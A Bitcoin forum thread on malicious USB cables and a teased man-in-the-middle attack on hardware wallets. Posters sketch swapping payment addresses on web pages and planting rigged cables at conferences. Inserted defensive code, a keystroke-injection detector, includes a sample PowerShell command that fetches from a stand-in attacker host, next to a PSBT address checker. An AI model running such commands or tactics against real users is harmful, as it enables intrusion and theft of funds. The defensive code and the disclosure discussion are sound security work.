Bitcoin Forum
Author Topic: Be careful what you plug your hardware wallet into your PC with  (Read 508 times)
DaveF (OP)
Legendary

Activity: 3654
Merit: 6671


March 24, 2022, 03:47:59 AM
Merited by PrivacyG (5), Welsh (4), o_e_l_e_o (4), vapourminer (3), dkbit98 (3), Pmalek (1)
 #1

https://hak5.org/products/omg-adapter

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.

For now I can't talk about it, but I can say (and have said in the past) don't trust anything you plug into your PC to verify anything else.
With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.

More in a few weeks (hopefully).

-Dave

jackg
Copper Member
Legendary

Activity: 2856
Merit: 3071


March 24, 2022, 05:31:57 AM
Merited by DaveF (2)
 #2

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.

Do you know how easy the vulnerability you found would be to patch - is it likely to not remain one for long or is it quite well embedded (feel free to wait on answering this)?
witcher_sense
Legendary

Activity: 2450
Merit: 4415


March 24, 2022, 08:02:32 AM
Merited by vapourminer (3), DaveF (2), ABCbits (1), Pmalek (1)
 #3

https://hak5.org/products/omg-adapter

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.

For now I can't talk about it, but I can say (and have said in the past) don't trust anything you plug into your PC to verify anything else.
With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.

More in a few weeks (hopefully).

-Dave
Cables and adapters able to steal users' data have been around for a while; here are some articles on this topic:
https://www.vice.com/en/article/k789me/omg-cables-keylogger-usbc-lightning
https://plugavel.com/3025/tech/this-usb-c-cable-can-steal-your-data/
https://fossbytes.com/not-so-innocent-usb-cable-uses-wifi-to-hack-your-device/
https://fossbytes.com/usbharpoon-usb-cable-malware-transfer/
https://shop.hak5.org/collections/mischief-gadgets/products/o-mg-cable-usb-a


With these USB cables, hackers can steal passwords and record pretty much everything you type with your keyboard, inject malicious payloads, reflash the system's firmware, remotely execute different commands, etc. However, I have never heard that any hardware wallet has been hacked this way. Hardware wallets generally transfer neither private keys nor any other sensitive information through a USB connection, so there is nothing hackers can intercept via cables like this. I don't know, maybe it is possible to install malicious custom firmware on the device which will allow for seed extraction. They won't extract a passphrase though, because it is not stored anywhere and is usually typed on the device itself.

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.
Normally, the entire recovery process takes place, or should take place, on the device itself; typing your seed on a computer is a terrible practice in principle.

As an example: https://wiki.trezor.io/User_manual:Recovery

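The cables witcher_sense lists above work by enumerating as a USB keyboard and typing a scripted payload into whatever has focus. One host-side check a practitioner can run against that behaviour, given here as an added example that is not from the thread or from any of the linked products, is to watch the keyboard event stream for bursts that arrive faster than a person can type. The event stream, the 40 ms floor, the 12-key burst length and the "attacker.example" command string below are all constructed assumptions for the illustration; a real deployment would feed events from the OS input layer (evdev, a keyboard hook) instead of a list, and a cable configured to type at human speed with random jitter will not trip this heuristic.

```python
# Added example (not from the thread): flag keystroke bursts that arrive faster than a
# person types. O.MG/BadUSB-style cables enumerate as a keyboard and "play back" a
# scripted payload at a near-constant, sub-human interval. The thresholds and the
# event stream below are constructed for this illustration, not measured values.

HUMAN_MIN_INTERVAL_MS = 40   # assumption: sustained gaps below this are not human
BURST_KEYS = 12              # assumption: this many consecutive fast keys = injected


def _summarise(run):
    return {
        "start_ms": run[0][0],
        "end_ms": run[-1][0],
        "keys": len(run),
        "mean_interval_ms": (run[-1][0] - run[0][0]) / max(len(run) - 1, 1),
        "text": "".join(key for _, key in run),
    }


def find_injected_bursts(events, min_interval_ms=HUMAN_MIN_INTERVAL_MS,
                         burst_keys=BURST_KEYS):
    """events: [(timestamp_ms, key), ...] in arrival order.
    Returns one summary per run of >= burst_keys keys whose every inter-key gap is
    below min_interval_ms. The text is kept so an analyst can see what was typed."""
    bursts, run = [], []
    for event in events:
        if run and event[0] - run[-1][0] < min_interval_ms:
            run.append(event)
            continue
        if len(run) >= burst_keys:          # a run ended on a human-sized gap
            bursts.append(_summarise(run))
        run = [event]
    if len(run) >= burst_keys:              # a run still open at end of stream
        bursts.append(_summarise(run))
    return bursts


def typed(start_ms, interval_ms, keys):
    """Helper to build a constructed event stream at a fixed cadence."""
    return [(start_ms + i * interval_ms, key) for i, key in enumerate(keys)]


# Constructed sample: a person typing at ~130 ms/key, then a cable opening the Run
# dialog and typing a hypothetical command at 8 ms/key, then the person again.
INJECTED_TEXT = "powershell -w hidden iwr attacker.example/p"
SAMPLE_EVENTS = (
    typed(0, 130, list("hello there"))
    + [(5000, "<GUI-r>")]                   # chord, followed by a scripted DELAY
    + typed(5300, 8, list(INJECTED_TEXT) + ["<ENTER>"])
    + typed(9000, 140, list("ok"))
)

if __name__ == "__main__":
    for b in find_injected_bursts(SAMPLE_EVENTS):
        print(f"{b['keys']} keys in {b['end_ms'] - b['start_ms']} ms "
              f"(mean {b['mean_interval_ms']:.1f} ms): {b['text']!r}")
```

The detector deliberately keys on timing rather than content, so the same command typed by hand at a human cadence is not flagged; conversely it says nothing about a cable that only logs keystrokes and never types, which is why it complements rather than replaces a USB device allow-list.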
NeuroticFish
Legendary

Activity: 3864
Merit: 6591


March 24, 2022, 08:20:37 AM
Merited by DaveF (2)
 #4

a MITM attack working against a certain hardware wallet.

Since the only valid uses for a cable are for signing transactions and maybe for charging, I'd guess that the transaction info going to the HW could be altered with the "right" cable (wouldn't such a cable be too bulky?!)
But even then, such an attack could work only if one doesn't pay attention to what the HW screen shows before signing (unless it's Jack's screenless future HW lol).

However, I guess that the validation (or not) for my theory may have to wait "a few weeks"...

PrivacyG
Legendary

Activity: 980
Merit: 2004


March 24, 2022, 08:28:45 AM
Merited by vapourminer (2), DaveF (2), m2017 (1)
 #5

(wouldn't such a cable be too bulky?!)
I just wanted to ask this.  Is there no way to tell a compromised cable from a non-malicious one?  One thing I never do is use any cable other than those I have always trusted or that came with the product.  I understand it is possible to be targeted and have a cable compromised, but besides Neurotic's attack scenario, I do not think there is any way you could be attacked?

If there was a way to do something malicious due to the cable being compromised, then I suppose it would also be possible to attack a Hardware Wallet through any computer infected with the right malware.  Right?

-
Regards,
PrivacyG

NeuroticFish
Legendary

Activity: 3864
Merit: 6591


March 24, 2022, 08:43:09 AM
Merited by vapourminer (2), DaveF (2)
 #6

(wouldn't such a cable be too bulky?!)
I just wanted to ask this.  Is there no way to tell a compromised cable from a non malicious one?

I remembered that I've seen here in the past a discussion about malicious cables and I've found it: https://bitcointalk.org/index.php?topic=5186863
It looks like the cable is not really different from normal ones; at least no visible difference. So it's a real problem.

PawGo
Legendary

Activity: 952
Merit: 1385


March 24, 2022, 10:52:50 AM
Merited by vapourminer (2), DaveF (2)
 #7

https://hak5.org/products/omg-adapter

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.


Very interesting, I can't wait.
It reminds me of the famous "USB Ninja" project: https://usbninja.com or USBHarpoon.
And it makes me think about all those people who connect their smartphones to "free chargers".

DaveF (OP)
Legendary

Activity: 3654
Merit: 6671


March 24, 2022, 11:43:50 AM
Last edit: March 24, 2022, 12:47:06 PM by DaveF
Merited by vapourminer (2), NeuroticFish (2), hugeblack (2)
 #8

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.

Do you know how easy the vulnerability you found would be to patch - is it likely to not remain one for long or is it quite well embedded (feel free to wait on answering this)?

I don't know, I'm a network and hardware guy. I got about 20% of the way into his explanation before my eyes glazed over.

a MITM attack working against a certain hardware wallet.

Since the only valid uses for a cable are for signing transactions and maybe for charging, I'd guess that the transaction info going to the HW could be altered with the "right" cable (wouldn't such a cable be too bulky?!)
But even then, such an attack could work only if one doesn't pay attention to what the HW screen shows before signing (unless it's Jack's screenless future HW lol).

However, I guess that the validation (or not) for my theory may have to wait "a few weeks"...

(wouldn't such a cable be too bulky?!)
I just wanted to ask this.  Is there no way to tell a compromised cable from a non-malicious one?  One thing I never do is use any cable other than those I have always trusted or that came with the product.  I understand it is possible to be targeted and have a cable compromised, but besides Neurotic's attack scenario, I do not think there is any way you could be attacked?

If there was a way to do something malicious due to the cable being compromised, then I suppose it would also be possible to attack a Hardware Wallet through any computer infected with the right malware.  Right?

-
Regards,
PrivacyG

Actually, the screen on the device shows the correct information, as does the screen of your PC. Remember, not only can it record keyboard strokes, it can play them back. As in edit webpages. What it can't do at this point is generate QR codes / graphics.

Not only do the cables look the same, since USB C to A cables are still new to a lot of people they would not know the difference anyway.

This is one of the few times BIP 70 would have actually been useful.

-Dave

dkbit98
Legendary

Activity: 2422
Merit: 7572



March 24, 2022, 01:51:03 PM
Merited by vapourminer (2), DaveF (2)
 #9

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.
Please try doing that with airgapped hardware wallets like Passport or Keystone that don't use any cable connection with the computer... I can't wait to see the results :)

With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.
I am not a big fan of using USB-C as universal USB connector for all devices but it looks like we are going in that direction.
They are even using the same USB type C for charging devices like laptops and smartphones, and I've seen that cause problems on some laptops, because people confuse the power cable with USB and they blow up the board.
It's not that hard to imagine some malicious cables could target hardware wallet users, that is why I would only use original cables made by the manufacturers.

DaveF (OP)
Legendary

Activity: 3654
Merit: 6671


March 24, 2022, 04:20:04 PM
Merited by vapourminer (2)
 #10

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.
Please try doing that with airgapped hardware wallets like Passport or Keystone that don't use any cable connection with the computer... I can't wait to see the results :)

With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.
I am not a big fan of using USB-C as universal USB connector for all devices but it looks like we are going in that direction.
They are even using the same USB type C for charging devices like laptops and smartphones, and I've seen that cause problems on some laptops, because people confuse the power cable with USB and they blow up the board.
It's not that hard to imagine some malicious cables could target hardware wallet users, that is why I would only use original cables made by the manufacturers.


It will do those easier if it's just putting in an address. It's actually trivial.
Remember it's not just a key logger, it can also run apps and put stuff into the PC.
So if he can get to the page inspector in Chrome (or whatever it is in that particular browser) he can modify a BTC address at a known location. Since it's always in the same space here: https://bitcointalk.org/index.php?action=credit;promote it's a known spot in the code that can be changed to his address. For now it can only change the address; QR codes cannot be done (yet).

The trick with the HW wallet is that it's breaking the encryption loop with their app.
As I said WAY over my head in programming.

As for only using the original cables, it's like you said: USB A on a lot of machines is going away, so until they give you a cable that is USB C you need one of these adapter things.

-Dave

jackg
Copper Member
Legendary

Activity: 2856
Merit: 3071


March 24, 2022, 05:33:14 PM
 #11

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.
Normally, the entire recovery process takes place, or should take place, on the device itself; typing your seed on a computer is a terrible practice in principle.

As an example: https://wiki.trezor.io/User_manual:Recovery

Ohhhhh it's been updated! Afaik the last time I tried to recover my trezor it asked me to input the mnemonic in a different order (based on what the device said and asked for some extra words but I wasn't sure how much I trusted that - this was 3 or 4 years ago).
m2017
Legendary

Activity: 2002
Merit: 1402


March 24, 2022, 05:56:59 PM
 #12

And it makes me think about all those people who connect their smartphones to "free chargers".
Wow. But really, this is a great way to get malware on your phone. In modern times, in addition to the usual software hygiene of your device, it will include "do not charge in suspicious places and with unfamiliar cables."

With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.
I am not a big fan of using USB-C as universal USB connector for all devices but it looks like we are going in that direction.
Looks like there's a new reason to keep an extra PC/laptop to interact with crypto. Of course, with USB type A, even then no adapters are required. This means that the threat described in this topic will be excluded.

More and more manufacturers are refusing to use USB A in their devices, and over time this will lead to a shortage of such devices. The market for used devices will not be endless either.

NeuroticFish
Legendary

Activity: 3864
Merit: 6591


March 24, 2022, 06:33:03 PM
Last edit: May 14, 2023, 02:59:11 PM by NeuroticFish
 #13

Looks like there's a new reason to keep an extra PC/laptop to interact with crypto. Of course, with USB type A, even then no adapters are required. This means that the threat described in this topic will be excluded.

USB A can easily handle exploits for PC/laptops, see the link from my other post here.
So by making the wrong assumptions, instead of protecting one, you can end up getting malware on the other.

More and more manufacturers are refusing to use USB A in their devices, and over time this will lead to a shortage of such devices. The market for used devices will not be endless either.

This doesn't really make sense. USB A is still widely used for PCs, I don't think they'll be no longer produced too soon. And, if you want to, you can easily buy cheap and straightforward adapters from USB A to micro USB or USB-C like this one:


DaveF (OP)
Legendary

Activity: 3654
Merit: 6671


March 24, 2022, 06:39:07 PM
Merited by NeuroticFish (2)
 #14

Looks like there's a new reason to keep an extra PC/laptop to interact with crypto. Of course, with USB type A, even then no adapters are required. This means that the threat described in this topic will be excluded.

USB A can easily handle exploits for PC/laptops, see the link from my other post here.
So by making the wrong assumptions, instead of protecting one, you can end up getting malware on the other.

More and more manufacturers are refusing to use USB A in their devices, and over time this will lead to a shortage of such devices. The market for used devices will not be endless either.

This doesn't really make sense. USB A is still widely used for PCs, I don't think they'll be no longer produced too soon. And, if you want to, you can easily buy cheap and straightforward adapters from USB A to micro USB or USB-C like this one:



<Cough> MacBooks </cough> And any of the ultra portable PC ones (Microsoft surface, etc.) are all USB A only.

Having one of those small adapters is nice. But people are people, and people forget things.
If I drop a few of those cables around a show like BlackHat or Defcon probably nobody is going to plug them into anything.
Leave a few around Bitcoin Miami and you could probably get someone to plug them in.

Buy a few dozen (yes it's expensive) but then put a logo on for something that looks like a giveaway and you know people are going to use it....

-Dave

NeuroticFish
Legendary

Activity: 3864
Merit: 6591


March 24, 2022, 06:42:51 PM
 #15

Leave a few around Bitcoin Miami and you could probably get someone to plug them in.

Well, we know that most aren't into Bitcoin because of the tech ;)
And then I can guess the horror (and the bad publicity) if such an exploit indeed happens at a big Bitcoin event :D

n0nce
Hero Member

Activity: 896
Merit: 5918


March 25, 2022, 12:44:24 AM
 #16

Having one of those small adapters is nice. But people are people, and people forget things.
If I drop a few of those cables around a show like BlackHat or Defcon probably nobody is going to plug them into anything.
Leave a few around Bitcoin Miami and you could probably get someone to plug them in.

Buy a few dozen (yes it's expensive) but then put a logo on for something that looks like a giveaway and you know people are going to use it....
You'd be surprised how often you do find USB freebies at conferences such as BlackHat and similar. :D
Infecting PCs using free USB devices is a very common practice and even part of the toolbelt of lots of professional pentesting companies.

Until now, I was under the impression that if you only transmit PSBTs through USB, a simple corrupting / replacing attack would definitely lead to the wrong address showing on the hardware device's screen.
I'm very excited to see how you're going to circumvent this for hacking USB hardware wallets, though!

It will do those easier if it's just putting in an address. It's actually trivial.
Remember it not just a key logger, it can also run apps and put stuff into the PC.
So if he can get to the page inspector in chrome (or whatever it is in that particular browser) he can modify a BTC address at a known location. Since it's always in the same space here: https://bitcointalk.org/index.php?action=credit;promote it's a known spot in code that can change to his address. For now it can only change the address QR codes cannot be done (yet)
From this text it appears to me that you're just replacing the address shown on screen with a malicious one as well as sending that address to the hardware device; thus the user sees the same one on both devices. That's quite smart and should be relatively simple to do, sounds good to me!

The trick with the HW wallet is that it's breaking the encryption loop with their app.
I don't understand this however. You're breaking encryption now? Why?

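n0nce's point above, and NeuroticFish's in #4, is that a hardware wallet renders the outputs of the PSBT it is actually handed, so the on-device screen check only helps if the user compares it with an address obtained somewhere the compromised host (or the edited web page DaveF describes) cannot touch. The following is an added example, not code from the thread or from any wallet vendor: it pulls the unsigned transaction out of a PSBT, turns each output's scriptPubKey into the mainnet address the device will display, and lists any output that is not in an allow-list confirmed out of band. It handles PSBT v0 with P2PKH, P2SH, P2WPKH and P2WSH outputs only (no bech32m/Taproot, no PSBT v2). The sample PSBT is constructed inline with one dummy input and the BIP173 test-vector hash160, so it spends nothing; the function and constant names are this example's own.

```python
# Added example (not from the thread): decode a PSBT's outputs into the addresses a
# hardware wallet will show, so they can be checked against an address obtained
# out of band before the device is asked to sign. PSBT v0, mainnet, P2PKH/P2SH/
# P2WPKH/P2WSH only. The sample PSBT at the bottom is constructed and spends nothing.
import base64
import hashlib

BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def _bech32_polymod(values):
    gen = [0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3]
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk

def _bech32_encode(hrp, data):
    # BIP173 bech32 (checksum constant 1): correct for witness version 0 only.
    hrp_exp = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    polymod = _bech32_polymod(hrp_exp + data + [0] * 6) ^ 1
    checksum = [(polymod >> 5 * (5 - i)) & 31 for i in range(6)]
    return hrp + "1" + "".join(BECH32_CHARSET[d] for d in data + checksum)

def _to_5bit(data):
    acc, bits, out = 0, 0, []
    for b in data:
        acc, bits = (acc << 8) | b, bits + 8
        while bits >= 5:
            bits -= 5
            out.append((acc >> bits) & 31)
    if bits:
        out.append((acc << (5 - bits)) & 31)
    return out

def _base58check(payload):
    raw = payload + hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    n, s = int.from_bytes(raw, "big"), ""
    while n:
        n, r = divmod(n, 58)
        s = B58_ALPHABET[r] + s
    return "1" * (len(raw) - len(raw.lstrip(b"\x00"))) + s

def script_to_address(spk):
    """Map a scriptPubKey to the address a wallet screen would render for it."""
    if len(spk) == 25 and spk[:3] == b"\x76\xa9\x14" and spk[-2:] == b"\x88\xac":
        return _base58check(b"\x00" + spk[3:23])                # P2PKH
    if len(spk) == 23 and spk[:2] == b"\xa9\x14" and spk[-1:] == b"\x87":
        return _base58check(b"\x05" + spk[2:22])                # P2SH
    if len(spk) in (22, 34) and spk[0] == 0 and spk[1] == len(spk) - 2:
        return _bech32_encode("bc", [0] + _to_5bit(spk[2:]))   # P2WPKH / P2WSH
    raise ValueError("unsupported scriptPubKey: " + spk.hex())

def _compact_size(buf, pos):
    n = buf[pos]
    if n < 0xFD:
        return n, pos + 1
    w = {0xFD: 2, 0xFE: 4, 0xFF: 8}[n]
    return int.from_bytes(buf[pos + 1:pos + 1 + w], "little"), pos + 1 + w

def unsigned_tx_from_psbt(psbt):
    if psbt[:5] != b"psbt\xff":
        raise ValueError("not a PSBT")
    pos = 5
    while psbt[pos] != 0:                     # walk the global key/value map
        klen, pos = _compact_size(psbt, pos)
        key, pos = psbt[pos:pos + klen], pos + klen
        vlen, pos = _compact_size(psbt, pos)
        val, pos = psbt[pos:pos + vlen], pos + vlen
        if key == b"\x00":                    # PSBT_GLOBAL_UNSIGNED_TX
            return val
    raise ValueError("PSBT has no unsigned transaction (PSBT v2?)")

def tx_outputs(tx):
    """[(value_sats, address), ...] from a serialized non-witness transaction."""
    n_in, pos = _compact_size(tx, 4)                  # skip version
    for _ in range(n_in):
        slen, pos = _compact_size(tx, pos + 36)       # skip prevout txid + index
        pos += slen + 4                               # scriptSig + sequence
    n_out, pos = _compact_size(tx, pos)
    outs = []
    for _ in range(n_out):
        value = int.from_bytes(tx[pos:pos + 8], "little")
        slen, pos = _compact_size(tx, pos + 8)
        outs.append((value, script_to_address(tx[pos:pos + slen])))
        pos += slen
    return outs

def psbt_outputs(psbt_b64):
    return tx_outputs(unsigned_tx_from_psbt(base64.b64decode(psbt_b64)))

def unexpected_outputs(psbt_b64, confirmed_addresses):
    # Anything paying outside the out-of-band confirmed set is a candidate MITM edit.
    return [(v, a) for v, a in psbt_outputs(psbt_b64) if a not in confirmed_addresses]

# Constructed sample: one dummy input, 100000 sat to P2WPKH and 50000 sat to P2PKH,
# both built on the BIP173 test-vector hash160 751e76e8...3bd6.
SAMPLE_TX = bytes.fromhex(
    "02000000" "01" + "11" * 32 + "00000000" "00" "ffffffff"
    "02"
    "a086010000000000" "16" "0014751e76e8199196d454941c45d1b3a323f1433bd6"
    "50c3000000000000" "19" "76a914751e76e8199196d454941c45d1b3a323f1433bd688ac"
    "00000000")
SAMPLE_PSBT = base64.b64encode(b"psbt\xff" + b"\x01\x00" + bytes([len(SAMPLE_TX)])
                               + SAMPLE_TX + b"\x00" + b"\x00" + b"\x00\x00").decode()

if __name__ == "__main__":
    for value, addr in psbt_outputs(SAMPLE_PSBT):
        print(f"{value:>9} sat -> {addr}")
```

Run it on a machine you trust against the PSBT the host app is about to send to the device, with the allow-list filled from a channel the host cannot edit (the merchant's address read over the phone, a printed invoice); if the host is the thing you suspect, the decode has to happen elsewhere. The change-address case is the usual gap: a wallet that marks change on screen still needs the user to confirm the change derivation belongs to them, which this example does not do.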
DaveF (OP)
Legendary

Activity: 3654
Merit: 6671


March 25, 2022, 02:56:11 AM
Merited by vapourminer (2)
 #17

I don't understand this however. You're breaking encryption now? Why?

Once again, I'm not, he is :-)

But he is not sending the bad address to the device, that is the issue. The user can copy / paste the info, but leaving the manufacturer out of it, there is a browser plug in they use to talk to the hardware wallet.

As of now THAT is not fooled by the find / replace on the web page since it sees it as it loads or something. Explained to me but as I said I lost it after the 1st few minutes of the explanation.

Just so you know how dangerous devices like this are here are just the PUBLIC DOWNLOADABLE things you can load on it.
https://hak5.org/blogs/payloads  (7 pages of fun)

-Dave


n0nce
Hero Member

Activity: 896
Merit: 5918


March 25, 2022, 12:15:19 PM
 #18

I don't understand this however. You're breaking encryption now? Why?

Once again, I'm not, he is :-)

But he is not sending the bad address to the device, that is the issue. The user can copy / paste the info, but leaving the manufacturer out of it, there is a browser plug in they use to talk to the hardware wallet.

As of now THAT is not fooled by the find / replace on the web page since it sees it as it loads or something. Explained to me but as I said I lost it after the 1st few minutes of the explanation.

Just so you know how dangerous devices like this are here are just the PUBLIC DOWNLOADABLE things you can load on it.
https://hak5.org/blogs/payloads  (7 pages of fun)
Honestly, I don't get why the attacker would 'talk to the hardware wallet' directly; it would be the most trivial and easy thing, if you have a way to manipulate webpages locally, to just replace the address, so the user himself copies the 'bad address' to the wallet and signs a transaction that spends money to it. This should also work pretty 'universally' against a variety of wallets, whereas other methods might be restricted to specific manufacturers / wallets only.
But I'll just wait and see once more information can be released publicly; no hurry. ;)

Oh, I know about these devices, they're really good, I used them in the past, too.

Pmalek
Legendary

Activity: 2954
Merit: 7554


March 26, 2022, 08:36:02 AM
 #19

Depending on how severe this vulnerability or bug is, will the two of you reveal and discuss this with the manufacturing company first before releasing any details to the public? I think you should and I hope you will. There might be a bug bounty in it for you if you do. But more importantly, you won't be making life easier for those who want to destroy everything and steal money from people.   

n0nce
Hero Member

Activity: 896
Merit: 5918


March 26, 2022, 01:38:27 PM
Merited by Pmalek (1)
 #20

Depending on how severe this vulnerability or bug is, will the two of you reveal and discuss this with the manufacturing company first before releasing any details to the public? I think you should and I hope you will. There might be a bug bounty in it for you if you do. But more importantly, you won't be making life easier for those who want to destroy everything and steal money from people.   
It would also get them into big legal trouble if they don't make a responsible disclosure. In cybersecurity it's either that, or selling the exploit. Releasing online without notice to the manufacturer brings you 0 benefits and >0 troubles. :D
